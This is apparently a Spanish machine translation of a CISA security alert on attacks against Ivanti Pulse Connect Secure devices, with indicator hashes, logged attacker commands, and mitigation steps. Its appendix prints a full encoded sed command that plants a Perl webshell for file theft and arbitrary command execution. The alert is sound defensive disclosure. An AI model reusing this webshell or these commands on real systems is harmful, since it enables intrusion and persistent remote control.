Exploitation Pulse Connect Secure
La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) es consciente de los compromisos que afectan a las agencias gubernamentales de EE. UU., Las entidades de infraestructura crítica y otras organizaciones del sector privado por parte de un actor o actores de amenazas cibernéticas a partir de junio de 2020 o antes relacionados con vulnerabilidades en ciertos Ivanti Pulse Connect. Productos seguros. Desde el 31 de marzo de 2021, CISA ayudó a múltiples entidades cuyos productos vulnerables Pulse Connect Secure han sido explotados por un actor de amenazas cibernéticas. Estas entidades confirmaron la actividad maliciosa después de ejecutar la herramienta Ivanti Integrity Checker . Para obtener acceso inicial, el actor de amenazas está aprovechando múltiples vulnerabilidades, incluidas CVE-2019-11510 , CVE-2020-8260 , CVE-2020-8243 y la recientemente divulgadaCVE-2021-22893 . El actor de amenazas está utilizando este acceso para colocar webshells en el dispositivo Pulse Connect Secure para un mayor acceso y persistencia. Los webshells conocidos permiten una variedad de funciones, incluida la omisión de autenticación, la omisión de autenticación multifactor, el registro de contraseñas y la persistencia a través de parches.
Ivanti ha proporcionado una mitigación y está desarrollando un parche. CISA recomienda encarecidamente a las organizaciones que utilizan dispositivos Ivanti Pulse Connect Secure que ejecuten de inmediato la herramienta Ivanti Integrity Checker , que actualicen a la última versión del software e investiguen en busca de actividad maliciosa.
Detalles técnicos
El 31 de marzo de 2021, Ivanti lanzó una herramienta de verificación de integridad para detectar la integridad de los dispositivos Pulse Connect Secure. Su boletín técnico dice:Somos conscientes de los informes de que un número limitado de clientes ha identificado actividad inusual en sus dispositivos Pulse Connect Secure (PCS). La investigación hasta la fecha muestra los intentos en curso de explotar las vulnerabilidades descritas en dos avisos de seguridad que fueron parcheados en 2019 y 2020 para abordar problemas previamente conocidos: Aviso de seguridad SA44101 (CVE-2019-11510) y Aviso de seguridad SA44601 (CVE- 2020- 8260). Para obtener más información, visite KB44764 (Preguntas frecuentes del cliente).
El supuesto actor de ciberamenazas modificó varios archivos legítimos de Pulse Secure en los dispositivos Pulse Connect Secure afectados. Las modificaciones implementaron una variedad de funciones de webshell:
DSUpgrade.pm MD5
:4d5b410e1756072a701dfd3722951907
- Ejecuta comandos arbitrarios que se le pasan
- Copia el código malicioso en
Licenseserverproto.cgi
Licenseserverproto.cgi MD5
:9b526db005ee8075912ca6572d69a5d6
- Copia la lógica maliciosa en los nuevos archivos durante el proceso de parcheo, lo que permite la persistencia.
Secid_canceltoken.cgi MD5
:f2beca612db26d771fe6ed7a87f48a5a
- Ejecuta comandos arbitrarios pasados a través de
HTTP
solicitudes
- Ejecuta comandos arbitrarios pasados a través de
compcheckresult.cgi MD5
:ca0175d86049fa7c796ea06b413857a3
- Página pública para enviar comandos arbitrarios con
ID
argumentos
- Página pública para enviar comandos arbitrarios con
Login.cgi MD5
:56e2a1566c7989612320f4ef1669e7d5
- Permite la recolección de credenciales de usuarios autenticados
Healthcheck.cgi MD5:
8c291ad2d50f3845788bc11b2f603b4a
- Ejecuta comandos arbitrarios pasados a través de
HTTP
solicitudes
- Ejecuta comandos arbitrarios pasados a través de
Se encontraron otros archivos con funcionalidad adicional:
libdsplibs.so MD5
:416488b6c8a9bdb9c0cb592e36f44677
- Objeto compartido troyano para eludir la autenticación multifactor a través de una clave de puerta trasera codificada.
Muchas de las acciones tempranas del actor de amenazas se registran en el Registro de solicitudes no autenticadas como se ve en el siguiente formato, los URI se han redactado para minimizar el acceso a los webshells que aún pueden estar activos:
Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
Luego, el actor de amenazas ejecutó los comandos enumerados en la tabla 1 a través del webshell.
Tabla 1: Los comandos se ejecutan a través de webshell
Hora | Mando |
---|---|
2021-01-19T07: 46: 05.000 + 0000 | pwd |
2021-01-19T07: 46: 24.000 + 0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T08: 10: 13.000 + 0000 | cat%20/home/webserver/htdocs/dana-na/l[redacted] |
2021-01-19T08: 14: 18.000 + 0000 | Ver el Apéndice. |
2021-01-19T08: 15: 11.000 + 0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T08: 15: 49.000 + 0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T09: 03: 05.000 + 0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
2021-01-19T09: 04: 47.000 + 0000 | $mount |
2021-01-19T09: 05: 13.000 + 0000 | /bin/mount%20-o%20remount,rw%20/dev/root%20/ |
2021-01-19T09: 07: 10.000 + 0000 | $mount |
El actor de amenazas cibernéticas está utilizando dispositivos explotados ubicados en espacios IP residenciales, incluidos dispositivos de almacenamiento conectado a la red (NAS) y enrutadores para pequeñas empresas de varios proveedores, para usar como proxy su conexión para interactuar con las carcasas web que colocaron en estos dispositivos. Estos dispositivos, que el actor de la amenaza está utilizando para proxy de la conexión, se correlacionan con el país de la víctima y permiten que la actividad del actor se mezcle con la actividad normal del usuario de teletrabajo.
Los detalles sobre el movimiento lateral y la posexplotación aún se desconocen en este momento. CISA actualizará esta alerta a medida que esta información esté disponible.
Mitigaciones
CISA insta encarecidamente a las organizaciones que utilizan dispositivos Pulse Secure a:
- Revise la Guía de inicio rápido de la herramienta Ivanti Integrity Checker y las Preguntas frecuentes del cliente
- Ejecute la herramienta de verificación de integridad de Ivanti .
- La herramienta requiere reiniciar.
- Si está virtualizado, tome una instantánea antes de ejecutar.
- Si el dispositivo es físico, considere las consecuencias de reiniciar y ejecutar la herramienta y comuníquese con Ivanti para obtener ayuda o preguntas.
- Continúe ejecutando la herramienta diariamente hasta que se hayan implementado las mitigaciones XML o se haya implementado el parche.
- Implemente las mitigaciones publicadas por el proveedor. Según Ivanti Pulse Secure, las configuraciones XML provisionales enumeradas en la sección “Solución” de SA44784 – 2021-04: Aviso de fuera de ciclo: Vulnerabilidad de Pulse Connect Secure RCE (CVE-2021-22893) brindan una protección significativa contra la actividad del actor de amenazas.
- Actualice a la última versión del software, según el proceso descrito en el sitio web de Ivanti Pulse Secure, que contiene mejoras de seguridad.
Si las Herramientas del Comprobador de integridad encuentran archivos que no coinciden o no están autorizados, CISA insta a las organizaciones a:
- Comuníquese con CISA para informar sus hallazgos (consulte la sección Información de contacto a continuación).
- Póngase en contacto con Ivanti Pulse Secure para obtener ayuda en la captura de información forense.
- Revise el registro de “Solicitudes web no autenticadas” en busca de evidencia de explotación, si está habilitado.
- Cambie todas las contraseñas asociadas con las cuentas que pasan por el entorno Pulse Secure (incluidas las cuentas de usuario, las cuentas de servicio, las cuentas administrativas y cualquier cuenta que pueda ser modificada por cualquier cuenta descrita anteriormente; se debe suponer que todas estas cuentas están comprometidas). Nota: A menos que se produzca un restablecimiento exhaustivo de la contraseña, el restablecimiento de fábrica de un dispositivo Pulse Connect Secure (consulte el paso 3 a continuación) solo eliminará el código malicioso del dispositivo y es posible que no elimine al actor de la amenaza del entorno. El actor de la amenaza puede utilizar las credenciales recopiladas para recuperar el acceso incluso después de que el dispositivo esté completamente parcheado.
- Revise los registros en busca de autenticaciones no autorizadas que se originen en la dirección IP del dispositivo Pulse Connect Secure o el rango de arrendamiento DHCP del grupo de arrendamiento de VPN del dispositivo Pulse Connect Secure.
- Busque aplicaciones no autorizadas y tareas programadas en su entorno.
- Asegúrese de que no se hayan creado nuevos administradores ni se hayan agregado usuarios sin privilegios a grupos privilegiados.
- Elimine cualquier programa de acceso remoto no aprobado por la organización.
- Inspeccione cuidadosamente las tareas programadas en busca de scripts o ejecutables que puedan permitir que un actor de amenazas se conecte a un entorno.
Además de las recomendaciones anteriores, las organizaciones que encuentran evidencia de actividad o archivos maliciosos, sospechosos o anómalos deben considerar la guía en KB44764 – Preguntas frecuentes del cliente: Mejoras de la herramienta de integridad de seguridad de PCS , que incluye:
Después de la conservación, puede reparar su dispositivo Pulse Connect Secure de la siguiente manera:
- Desactivación de la interfaz externa.
- Guardando la configuración del sistema y del usuario.
- Realización de un restablecimiento de fábrica a través de la consola serie. Nota: Para obtener más información, consulte KB22964 (Cómo restablecer un dispositivo PCS a la configuración predeterminada de fábrica a través de la consola en serie)
- Actualización del dispositivo a la versión más reciente.
- Reimportación de la configuración guardada.
- Reactivación de la interfaz externa.
CISA recomienda realizar comprobaciones para garantizar que se remedia cualquier infección, incluso si la estación de trabajo o el host se han vuelto a crear. Estas comprobaciones deben incluir la ejecución de la herramienta Ivanti Integrity Checker nuevamente después de que se haya realizado la corrección .
Información del contacto
CISA anima a los destinatarios de este informe a contribuir con cualquier información adicional que puedan tener relacionada con esta amenaza. Para cualquier pregunta relacionada con este informe, comuníquese con CISA al
- 1-888-282-0870 (Desde fuera de los Estados Unidos: + 1-703-235-8832)
- central@cisa.dhs.gov (UNCLASS)
- us-cert@dhs.sgov.gov (SIPRNET)
- us-cert@dhs.ic.gov (JWICS)
CISA lo alienta a informar cualquier actividad sospechosa, incluidos incidentes de seguridad cibernética, posibles códigos maliciosos, vulnerabilidades de software y estafas relacionadas con el phishing. Los formularios de denuncia se pueden encontrar en la página de inicio de CISA / US-CERT en http://www.us-cert.cisa.gov/ .
Apéndice: Comando sed grande encontrado en registros no autenticados
Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\$n=\$_[0];my%20\$rs;for%20(my%20\$i=0;\$i%3C\$n;\$i++){my%20\$n1=int(rand(256));\$rs.=chr(\$n1);}return%20\$rs;}sub%20a{my%20\$st=\$_[0];my%20\$k=r([redacted]);my%20\$en%20=%20RC4(%20\$k.\$ph,%20\$st);return%20encode_base64(\$k.\$en);}sub%20b{my%20\$s=%20decode_base64(\$_[0]);%20my%20\$l=length(\$s);my%20\$k=%20substr(\$s,0,[redacted]);my%20\$en=substr(\$s,[redacted],\$l-[redacted]);my%20\$de%20=%20RC4(%20\$k.\$ph,%20\$en%20);return%20\$de;}sub%20c{my%20\$fi=CGI::param(%27img%27);my%20\$FN=b(\$fi);my%20\$fd;print%20\%22Content-type:%20application/x-download\\n\%22;open(*FILE,%20\%22%3C\$FN\%22%20);while(%3CFILE%3E){\$fd=\$fd.\$_;}close(*FILE);print%20\%22Content-Disposition:%20attachment;%20filename=tmp\\n\\n\%22;print%20a(\$fd);}sub%20d{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20text/html\\n\\n\%22;my%20\$fi%20=%20CGI::param(%27cert%27);\$fi=b(\$fi);my%20\$pa=CGI::param(%27md5%27);\$pa=b(\$pa);open%20(*outfile,%20\%22%3E\$pa\%22);print%20outfile%20\$fi;close%20(*outfile);}sub%20e{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20image/gif\\n\\n\%22;my%20\$na=CGI::param(%27name%27);\$na=b(\$na);my%20\$rt;if%20(!\$na%20or%20\$na%20eq%20\%22cd\%22)%20{\$rt=\%22Error%20404\%22;}else%20{my%20\$ot=\%22/tmp/1\%22;system(\%22\$na%20%3E/tmp/1%202%3E&1\%22);open(*cmd_result,\%22%3C\$ot\%22);while(%3Ccmd_result%3E){\$rt=\$rt.\$_;}close(*cmd_result);unlink%20\$ot}%20%20print%20a(\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\%22\%22){e();}else{%20%20%20&main();}}if%20(\$ENV{%27REQUEST_METHOD%27}%20eq%20\%22POST\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX
Fuente: us-cert.cisa